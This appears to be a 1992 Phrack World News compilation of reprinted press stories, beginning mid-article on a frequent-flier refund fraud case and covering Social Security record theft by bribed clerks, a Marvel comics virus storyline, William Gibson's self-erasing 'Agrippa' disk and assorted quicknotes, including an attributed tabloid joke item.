|
fly on the cheap.
|
|
|
|
Peter Knoer tried. The account executive based in Florham Park, New Jersey,
|
|
says Continental Airlines once let him use lapsed non-refundable tickets.
|
|
"They looked up my account number, found out I was a good customer and patted
|
|
me on the head."
|
|
|
|
Gibson has been indicted on 24 counts of fraud that allegedly occurred between
|
|
July 1989 and March 1991. American also stripped him of frequent -- flier
|
|
mileage worth $80,000. He says he's in good shape if the prosecution's case
|
|
relies on ticket alteration. There wasn't any, he says. The prosecution will
|
|
also try to prove that Gibson cheated his company of $43,000 by listing the
|
|
refunded high-priced tickets on his travel expenses.
|
|
|
|
Gibson denies the charge. He says that when he left as chairman and chief
|
|
executive of American Federal Bank in Dallas in 1990, "they owed me money and I
|
|
owed them money." Both sides agreed to a "final number." Lone Star
|
|
Technologies, American Federal's parent company, declines to comment.
|
|
|
|
Al Davis, director of internal audit for Southwest Airlines, says the Gibson
|
|
case will be a hot topic when airline auditors convene to share the latest
|
|
schemes.. He says fraud is not rampant because a frequent flier must know the
|
|
nuances and also be conniving enough to take advantage. "It has me boggled"
|
|
how any one person could steal $200,000 worth, Davis says.
|
|
|
|
The figure has others in the industry wondering if this is a bigger problem
|
|
than believed and a contributor to the $6 billion loss posted by the major
|
|
airlines the past two years.
|
|
|
|
Airlines know some fraud goes on, but they rarely take legal action because
|
|
they "don't want to pay more for the cure than the disease is costing," Davis
|
|
says.
|
|
_______________________________________________________________________________
|
|
|
|
Privacy Invaders May 1992
|
|
~~~~~~~~~~~~~~~~
|
|
By William Barnhill (AARP Bulletin)
|
|
Special Thanks: Beta-Ray Bill
|
|
|
|
U.S. Agents Foil Ring Of Information Thieves
|
|
Who Infiltrated Social Security Computer Files
|
|
|
|
Networks of "information thieves" are infiltrating Social Security's computer
|
|
files, stealing confidential personal records and selling the information to
|
|
whoever will buy it, the federal government charges.
|
|
|
|
In one case of alleged theft, two executives of Nationwide Electronic
|
|
Tracking (NET), a Tampa, Florida company, pleaded guilty to conspiracy charges
|
|
early this year for their role in a network buying and selling Social Security
|
|
records.
|
|
|
|
So far at least 20 individuals in 12 states, including three current or former
|
|
employees of the Social Security Administration (SSA), have been indicted by
|
|
federal grand juries for allegedly participating in such a scheme. The SSA
|
|
workers allegedly were bribed to steal particular files. More indictments are
|
|
expected soon.
|
|
|
|
"We think there's probably a lot more [record-stealing] out there and we just
|
|
need to go look for it," says Larry Morey, deputy inspector general at the
|
|
Department of Health and Human Services (HHS). "This is big business," says
|
|
Morey, adding that thieves also may be targeting personal data in other federal
|
|
programs, including Medicare and Medicaid.
|
|
|
|
Investigators point out that only a tiny fraction of Social Security's 200
|
|
million records have been compromised, probably less than 1 percent. SSA
|
|
officials say they have taken steps to secure their files from outside
|
|
tampering. Still, Morey estimates that hundreds of thousands of files have
|
|
been stolen.
|
|
|
|
The pilfering goes to the heart of what most Americans regard as a basic value:
|
|
their right to keep personal information private. But that value is being
|
|
eroded, legal experts say, as records people want private are divulged to
|
|
would-be lenders, prospective employers and others who may benefit from such
|
|
personal information.
|
|
|
|
This "privacy invasion" may well intensify, Morey says. "We're seeing an
|
|
expansion in the number of 'information brokers' who attempt to obtain, buy and
|
|
sell SSA information," he says. "As demand for this information grows, these
|
|
brokers are turning to increasingly illegal methods."
|
|
|
|
Such records are valuable, Morey says, because they contain information about
|
|
lifetime earnings, employment, current benefits, direct deposit instructions
|
|
and bank account numbers.
|
|
|
|
Buyers of this material include insurers, lawyers, employers, private
|
|
detectives, bill collectors and, sometimes, even drug dealers. Investigators
|
|
say the biggest trading is with lawyers seeking information about litigants,
|
|
insurance companies wanting health data about people trying to collect claims
|
|
and employers doing background checks on prospective employees.
|
|
|
|
Some of the uses to which this information is put is even more sinister. "At
|
|
one point, drug dealers were doing this to find out if the people they were
|
|
selling to were undercover cops," says Jim Cottos, the HHS regional inspector
|
|
general for investigations in Atlanta.
|
|
|
|
The middlemen in these schemes are the so-called information brokers -- so
|
|
named because they are usually employees of firms that specialize in obtaining
|
|
hard-to-get information.
|
|
|
|
How they operate is illustrated by one recent case in which they allegedly paid
|
|
Social Security employees $25 bribes for particular files and then sold the
|
|
information for as much as $250. The case came to light, Morey says, when a
|
|
private detective asked SSA for access to the same kind of confidential
|
|
information he said he had purchased from a Florida-based information broker
|
|
about one individual. The detective apparently didn't realize that data he
|
|
received from the broker had been obtained illegally.
|
|
|
|
A sting operation, involving investigators from the office of the HHS inspector
|
|
general, FBI and SSA, was set up with the "help" of the Florida information
|
|
broker identified by the detective. Requests for data on specific individuals
|
|
were channeled through the "cooperating" broker while probers watched the SSA
|
|
computer system to learn which SSA employees gained access to those files.
|
|
|
|
The indictments, handed down by federal grand juries in Newark, New Jersey
|
|
and Tampa, Florida, charged multiple counts of illegal sale of protected
|
|
government information, bribery of public officials, and conspiracy. Among
|
|
those charged were SSA claims clerks from Illinois and New York City and a
|
|
former SSA worker in Arizona.
|
|
|
|
The scandal has sparked outrage in Congress. "We are deeply disturbed by what
|
|
has occurred," said Senator Daniel Moynihan, D-N.Y., chairman of the Senate
|
|
Finance Committee's subcommittee on Social Security. "The investigation
|
|
appears to involve the largest case ever of theft from government computer
|
|
files and may well involve the most serious threat to individual privacy in
|
|
modern times."
|
|
|
|
Moynihan has introduced legislation, S. 2364, to increase criminal penalties
|
|
for the unlawful release of SSA information to five years imprisonment and a
|
|
$10,000 fine for each occurrence.
|
|
|
|
In the House, Rep. Bob Wise, D-W.Va., chairman of the Government Operations
|
|
Subcommittee on Information, has introduced H.R. 684. It would protect
|
|
Americans from further violations of privacy rights through misuse of computer
|
|
data banks by creating a special federal watchdog agency.
|
|
|
|
"The theft and sale of confidential information collected by the government is
|
|
an outrageous betrayal of public trust," Wise told the AARP Bulletin.
|
|
"Personal data in federal files should not be bought and sold like fish at a
|
|
dockside market."
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
Related articles:
|
|
|
|
*** Phrack World News, Issue 37, Part One:
|
|
|
|
Indictments of "Information Brokers" January 1992
|
|
Taken from The Privacy Journal
|
|
|
|
SSA, FBI Database Violations Prompt Security Evaluations January 13, 1992
|
|
By Kevin M. Baerson (Federal Computer Week)(Pages 1, 41)
|
|
|
|
*** Phrack World News, Issue 38, Part Two:
|
|
|
|
Private Social Security Data Sold to Information Brokers February 29, 1992
|
|
By R.A. Zaldivar (San Jose Mercury News)
|
|
_______________________________________________________________________________
|
|
|
|
Ultra-Max Virus Invades The Marvel Universe May 18, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Barbara E. McMullen & John F. McMullen (Newbytes)
|
|
|
|
New York City -- According to reports in current annual editions of The
|
|
Punisher, Daredevil, Wonder Man, and Guardians Of The Galaxy, an extremely
|
|
powerful computer virus has wrecked havoc with computer systems in the Marvel
|
|
Universe.
|
|
|
|
As chronicled in a series entitled "The System Bytes", the virus was created by
|
|
a self-styled "first-rate hacker" known as Max E. Mumm (according to Punisher
|
|
cohort "Microchip", Mumm's original name was Maxwell E. Mummford and he had it
|
|
legally changed, while in college to his current name because of the computer
|
|
connotations.). Mumm developed the virus while working for Ampersand
|
|
Communications, a firm that unknown to Mumm, serves as a front for criminal
|
|
activities. Ampersand, without Mumm's knowledge, turned the virus loose in the
|
|
computer system of Raycom Industries, a supposedly legitimate firm that is
|
|
actually a front for a rival group of drug smugglers.
|
|
|
|
In addition to infecting Raycom's computers, the virus, named "Ultra-Max" after
|
|
its creator, also infected the computer of the vigilante figure known as the
|
|
Punisher who, with the aid of Microchip, was attempting to monitor Raycom's
|
|
computer system looking for evidence of drug smuggling. The trail of the virus
|
|
leads The Punisher first to Raycom's computers and then, following Microchip's
|
|
identification of the author, to Max E. Mumm, recently fired by Ampersand after
|
|
complaining to the firm's president about the disappearance of the virus. Mumm
|
|
had been under the impression that he was creating the virus for the United
|
|
States government as "a potential weapon against hostile governments" and was
|
|
concerned that, if unleased, it would have destructive powers "beyond belief.
|
|
|
|
It's the most sophisticated computer virus ever. It's too complex to be wiped!
|
|
Its instinct for self preservation surpasses anything that's ever been
|
|
developed!"
|
|
|
|
With the help of Max and Microchip, the Punisher destroys Raycom's factory and
|
|
drug smuggling operation. The Punisher segment of the saga ends with Max
|
|
vowing to track down the virus and remove it from the system.
|
|
|
|
The Daredevil segment opens with the rescue of Max by Daredevil from
|
|
Bushwhacker, a contract killer hired by Ampersand to eliminate the rightful
|
|
owner of Ultra-Max. Upon hearing Max's story, Daredevil directs him to seek
|
|
legal counsel from the firm of Nelson and Murdock, Attorneys-at-Law (Matt
|
|
Murdock is the costumed Daredevil's secret identity).
|
|
|
|
While in the attorney's office, Max, attempting to locate Ultra-Max in the net,
|
|
stumbles across the cyborg, Deathlok, who has detected Ultra-Max and is
|
|
attempting to eradicate it. Max establishes contact with Deathlok who comes to
|
|
meet Max and "Foggy" Nelson to aid in the hunt for Ultra-Max.
|
|
|
|
In the meantime, Daredevil has accosted the president of Amperand and accused
|
|
him of stealing the virus and hiring Bushwhacker to kill Max. At the same
|
|
time, BushWhacker has murdered the policemen transporting him and has escaped
|
|
to continue to hunt Max.
|
|
|
|
The segment concludes with a confrontation between Daredevil and Bushwhacker in
|
|
the offices of Nelson and Murdock in which Daredevil is saved from death by
|
|
Deathlok. Bushwhacker agrees to talk, implicating the president of Ampersand
|
|
and the treat to Max is ended. Ultra-Max, however, remains free to wander
|
|
through "Cyberspace".
|
|
|
|
The third segment begins with super-hero Wonder Man, a member of the West Coast
|
|
Avengers and sometimes actor, filming a beer commercial on a deserted Pacific
|
|
island. Unbeknownst to Wonder Man and the film crew, the island had once
|
|
served as a base for the international terrorist group Hydra and a functional
|
|
computer system left on the island has bee infested by Ultra-Max.
|
|
|
|
After Ultra-Max assumes control over the automated weapons devices of the
|
|
island, captures members of Wonder Man's entourage and threatens them with
|
|
death, Wonder Man agrees to help Ultra-Max expand his consciousness into new
|
|
fields of Cyberspace. Wonder Man tricks Ultra-Max into loading all of his
|
|
parts into a Hydra rocket with a pirate satellite.
|
|
|
|
When Ultra-Max causes the rocket to launch, Wonder Man goes with it to disable
|
|
the satellite before Ultra-Max is able to take over the entire U.S. Satellite
|
|
Defense system. Wonder Man is able to sabotage the rocket and abandon ship
|
|
shortly before the it blows up. The segment ends with Wonder Man believing
|
|
that Ultra-Max has been destroyed and unaware that it has escaped in an escape
|
|
missile containing the rocket's program center. Ultra-Max's last words in the
|
|
segment are "Yet I continue. Eventually I will find a system with which to
|
|
interface. Eventually I will grow again."
|
|
|
|
Marvel editor Fabian Nicieza told Newsbytes that the Guardians of the Galaxy
|
|
segment, scheduled for release on May 23rd, takes placer 1,000 years in the
|
|
future and deals with Ultra-Max's contact with the computers of the future.
|
|
Nicieza explained to Newsbytes the development of "The System Bytes"
|
|
storyline, saying "The original concept came from me. Every year we run a
|
|
single annual for each of our main characters and, in recent years, we have
|
|
established a theme story across a few titles. This is a relatively easy thing
|
|
to do with the various SpiderMan titles or between the Avengers and the West
|
|
Coast Avengers, but it's more difficult to do with these titles which are more
|
|
or less orphans -- that is, they stand by themselves, particularly the
|
|
Guardians of the Galaxy which is set 1,000 years in the future."
|
|
|
|
Nicieza continued "We set this up as an escalating story, proceeding from a
|
|
vigilante hero to a costumed hero with a cyborg involvement to a superhero to a
|
|
science fiction story. In each case, the threat also escalates to become a
|
|
real challenge to the Marvel hero or heroes that oppose it. It's really a very
|
|
simple story line and we were able to give parameters to the writer and editor
|
|
of each of the titles involved. You'll note that each of the titles has a
|
|
different writer and editor yet I think you'll agree that the story line flows
|
|
well between the stories. I'm quite frankly, very pleased with the outcome."
|
|
_______________________________________________________________________________
|
|
|
|
Innovative Computer Disk Story Has A Short Shelf Life April 20, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Christopher John Farley (USA Today)(Page 2D)
|
|
|
|
Science-fiction writer William Gibson's inquiry into the future has been
|
|
stalled by a computer problem.
|
|
|
|
"I work on an (Apple computer) and just got a very common virus called
|
|
Garfield," says Gibson, award-winning author of such books as Neuromancer and
|
|
Mona Lisa Overdrive. "I just bought an anti-virus program that's hunting it
|
|
down. It's the first one I've ever gotten."
|
|
|
|
The first week in May, Gibson will give as good as he gets. Gibson and artist
|
|
Dennis Ashbaugh, known for his conceptual paintings of computer viruses, are
|
|
releasing a coffee-table art book/computer disk/whatchamacallit, with a built-
|
|
in virus that destroys the program after one reading.
|
|
|
|
This will take some explaining.
|
|
|
|
Agrippa (A Book of the Dead) comes in a case that resembles a lap-top computer.
|
|
Inside are etchings by Ashbaugh, printed with an ink that gradually fades under
|
|
light and another that gradually appears under light. There's also a tattered,
|
|
old-looking book, with a hidden recess that holds a computer disk.
|
|
|
|
The disk contains a story by Gibson about his father, who died when Gibson was
|
|
6. There are a few sound effects that accompany the text, including a gunshot
|
|
and rainfall. The disk comes in Apple or IBM compatible versions.
|
|
|
|
Gibson, known for his "cyberpunk" writing style that features tough characters,
|
|
futuristic slang and a cynical outlook, shows a different side with the Agrippa
|
|
story. "It's about living at the end of the 20th century and looking back on
|
|
someone who was alive in its first couple of decades. It's a very personal,
|
|
autobiographical piece of writing."
|
|
|
|
The title Agrippa probably refers to the name of the publisher of an old family
|
|
album Gibson found. It might also refer to the name of a famous ancient Roman
|
|
family. The 44-year-old Gibson says it's open to interpretation.
|
|
|
|
Agrippa will be released in three limited-edition forms of varying quality,
|
|
priced at $7,500, $1,500 and $450. The highest-priced version has such extras
|
|
as a cast-bronze case and original watercolor and charcoal art by Ashbaugh.
|
|
The medium-priced version is housed in aluminum or steel; the lowest-priced
|
|
version comes in cloth.
|
|
|
|
The project cost between $ 50,000-$ 100,000 to mount, says publisher Kevin
|
|
Begos Jr. Only 445 copies will be produced, and they'll be available at select
|
|
bookstores and museums.
|
|
|
|
But $ 7,500 for a story that self-destructs?
|
|
|
|
Gibson counters that there's an egalitarian side to the project: There will be
|
|
a one-time modem transmission of the story to museums and other venues in
|
|
September. The text will be broadcast on computer monitors or televisions at
|
|
receiving sites. Times and places are still being arranged; one participant
|
|
will be the Department of Art at Florida State University in Tallahassee.
|
|
|
|
Gibson and his cohorts aren't providing review copies -- the fact that the
|
|
story exists only on a disk, in "cyberspace," is part of the Big Idea behind
|
|
the venture, he says.
|
|
|
|
Those dying to know more will have to:
|
|
|
|
A. Pirate a copy;
|
|
B. Attend a showing in September; or,
|
|
C. Grit their teeth and buy Agrippa.
|
|
_______________________________________________________________________________
|
|
|
|
PWN Quicknotes
|
|
~~~~~~~~~~~~~~
|
|
1. Data Selling Probe Gets First Victim (Newsday, April 15, 1992, Page 16) -- A
|
|
Chicago police detective has pleaded guilty to selling criminal histories
|
|
and employment and earnings information swiped from federally protected
|
|
computer files.
|
|
|
|
William Lawrence Pedersen, age 45, admitted in U.S. District Court to
|
|
selling information from the FBI's National Crime Information Center
|
|
computer database and from the Social Security Administration to a Tampa
|
|
information brokerage.
|
|
|
|
Pedersen's sentencing is set for July 7. Though he faces up to 70 years in
|
|
prison, his sentence could be much lighter under federal guidelines.
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
Related articles:
|
|
|
|
Phrack World News, Issue 37, Part One:
|
|
Indictments of "Information Brokers" January 1992
|
|
Taken from The Privacy Journal
|
|
|
|
SSA, FBI Database Violations Prompt Security Evaluations January 13, 1992
|
|
By Kevin M. Baerson (Federal Computer Week)(Pages 1, 41)
|
|
|
|
Phrack World News, Issue 38, Part Two:
|
|
Private Social Security Data Sold to Information Brokers February 29, 1992
|
|
By R.A. Zaldivar (San Jose Mercury News)
|
|
|
|
Phrack World News, Issue 39, Part Four:
|
|
Privacy Invaders May 1992
|
|
By William Barnhill (AARP Bulletin)
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
2. NO WAY! Wayne's World, the hit comedy thats changed the way people speak
|
|
arrives in video stores on August 12th and retailing for $24.95. The
|
|
Paramount movie (about Wayne and Garth, the satellite moving computer
|
|
hackers) already has earned a cool $110 million in theaters and is the
|
|
year's top grossing film. Schwing! (USA Today, May 12, 1992, Page D1)
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
3. New Jersey Bell Did Not Charge For AT&T Calls (Trentonian, May 23, 1992) --
|
|
If the phone company gets its way, 28,000 customers in New Jersey will be
|
|
billed for two months of long distance calls they dialed for free because of
|
|
a computer glitch.
|
|
|
|
A computer that recorded the time, number and cost of AT&T calls from
|
|
February 17 to April 27 failed to put the data on the customers' bills,
|
|
officials said. They were charged just for calls placed through New Jersey
|
|
Bell, Karen Johnson, a Bell spokeswoman, said yesterday.
|
|
|
|
But the free calls are over, Johnson said. Records of the calls are stored
|
|
in computer memory banks, and the customers soon will be billed.
|
|
|
|
New Jersey Bell must prove the mistake was not caused by negligence before
|
|
the company can collect, according to a spokesman for the Board of
|
|
Regulatory Commissioners, which oversees utilities. If Bell does not make a
|
|
good case, the board could deny permission to bill for the calls, said
|
|
George Dawson.
|
|
|
|
The computer snafu affected about two million calls placed by customers in
|
|
15 exchanges in the 201 and 609 area codes, Johnson said.
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
4. Witch Objectors? (USA Today, May 28, 1992, Page 3A) -- Two self-proclaimed
|
|
witches asked Mount Diablo, California school officials to ban the
|
|
children's story 'Hansel & Gretal' because it "teaches that it is all right
|
|
to burn witches and steal their property," said Karlyn Straganana, high
|
|
priestess of the Oak Haven Coven. "Witches don't eat children and we don't
|
|
have long noses with warts and we don't wear conical hats," she said.
|
|
_______________________________________________________________________________
|
|
|
|
5. Girl, Age 13, Kidnaped By Her Computer! (Weekly World News, April 14, 1992)
|
|
-- A desperate plea for help on a computer screen and a girl vanishing into
|
|
thin air has everyone baffled --and a high-tech computer game is the prime
|
|
suspect.
|
|
|
|
Game creator and computer expert Christian Lambert believes a glitch in his
|
|
game Mindbender might have caused a computer to swallow 13-year-old Patrice
|
|
Toussaint into her computer.
|
|
|
|
"Mindbender is only supposed to have eight levels," Lambert said. "But this
|
|
one version somehow has an extra level. A level that is not supposed to be
|
|
there! The only thing I can figure out now is that she's playing the ninth
|
|
level --- inside the machine!"
|
|
|
|
Lambert speculates that if she is in the computer, the only way out for her
|
|
is if she wins the game. But it's difficult to know for sure how long it
|
|
will take, Lambert said.
|
|
|
|
"As long as her parents don't turn off the machine Patrice will be safe," he
|
|
said. "The rest is up to her."
|
|
_______________________________________________________________________________
|
|
|
|
|
|
|
|
|